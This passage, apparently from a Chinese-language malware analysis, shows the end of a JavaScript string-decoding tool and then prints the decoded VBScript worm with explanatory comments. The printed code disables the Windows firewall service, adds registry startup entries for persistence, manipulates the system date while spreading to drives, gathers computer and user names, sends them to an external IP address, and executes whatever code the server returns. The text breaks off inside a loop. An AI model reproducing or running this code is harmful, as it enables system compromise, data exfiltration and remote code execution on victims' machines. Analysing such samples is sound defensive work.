with(document){
if(rev.order.checked){
revedstr = rev.instr.value.split('').reverse().join('')
write("<strong>reversed string:</strong>",revedstr,"<br>");
write("<strong>unescape string:</strong>",unescape(revedstr),"<br>");
write("<strong>escape string:</strong>",escape(revedstr),"<br>");
}
else{
unescapstr = unescape(rev.instr.value);
revedstr = unescapstr.split('').reverse().join('');
write("<strong>uneacape string:</strong>",unescapstr,"<br/>");
write("<strong>reversed string:</strong>",revedstr);
}
}
}
</script>
</head>
<body>
<form action="" method="post" name="rev">
<input name="order" type="checkbox" value="" />转换顺序(先求反后解码)?<br />
<input name="instr" type="text" value="请在这里输入" onmousemove="this.select()"/>
<input name="" type="button" value="转换" onclick="_reverse()"/></form>
</body>
</html>
使用以上的工具对代码进行解码后代码如下:
On Error Resume Next
Set fso=CreateObject("scripting.filesystemobject")
Set wshshell=CreateObject(strreverse("wscript.shell"))
Dim dri_list,dri_list0
Dim issend
issend=0
c_time=Date()
' 这是关闭SharedAccess(Intemet连接共享和防火墙服务)。
wshshell.run "net stop sharedaccess",0
Set drvs=fso.drives
sysdir=fso.GetSpecialFolder(1) 'WindowsFolder=0,SystemFolder=1, TemporaryFolder=2
thispath=wscript.ScriptFullName
Set fc=fso.OpenTextFile(thispath,1) 'ForReading=1,ForWriting=2 ,ForAppending=8
scopy=fc.readall
fc.Close
Set fc=Nothing
' 写注册表注册文件sysinfo.reg,注册系统开机自动执行病毒
Call writefile(sysdir&"sysinfo.reg","windows registry editor version 5.00 [hkey_local_machinesoftwarepoliciesmicrosoftwindowssystemscriptsstartup��] "script"="%windir%system32prncfg.vbs" "parameters"="" "exectime"=hex(b):00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 [hkey_local_machinesoftwaremicrosoftwindowscurrentversiongroup policystatemachinescriptsstartup��] "script"="%windir%system32prncfg.vbs" "parameters"="" "exectime"=hex(b):00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
")
' 导入注册表sysinfo.reg
wshshell.run "regedit /s sysinfo.reg",0
wscript.sleep 200
fso.deletefile sysdir&"sysinfo.reg",True
' 如果当前运行脚本在系统目录中
If InStr(thispath,sysdir)>0 Then
dri_list0=listdrv()
o_time=left(c_time,3)&cstr(Int(Mid(c_time,4,1))-1)&Right(c_time,Len(c_time)-4) '回拨时间1年
wshshell.run "cmd /c Date "&o_time,0
wscript.sleep 10000
For dri_i=1 to Len(dri_list0)
Call writeauto(Mid(dri_list0,dri_i,1)&":")
Next
wshshell.run "cmd /c Date "&c_time,0
' WMI应用查询计算机名,用户名
computername="":username=""
Set objwmiservice=GetObject("winmgmts:{impersonationlevel=impersonate}!.rootcimv2")
Set colcomputers = objwmiservice.execquery("select * from win32_computersystem")
For Each objcomputer in colcomputers
computername=objcomputer.name
username=objcomputer.username
Next
If username="" Then username="evar"
If InStr(username,"")<=0 Then
username=computername&""&username
End If
do
If issend=0 Then
' 链接外网,获得执行代码
Set xml=CreateObject("msxml2.serverxmlhttp")
xml.open "get","http://202.119.104.100/zzb/eva/count.asp?a="&username,0
' http://202.119.104.100/zzb/是南师大学校党委组织部主办的网站
xml.setrequestheader "user-agent","evar"
xml.send()
If Err.number=0 Then
issend=1
res=xml.responsetext
If ucase(left(res,7))=ucase("Execute") Then Execute res
Else
Err.clear
End If
Set xml=Nothing
End If
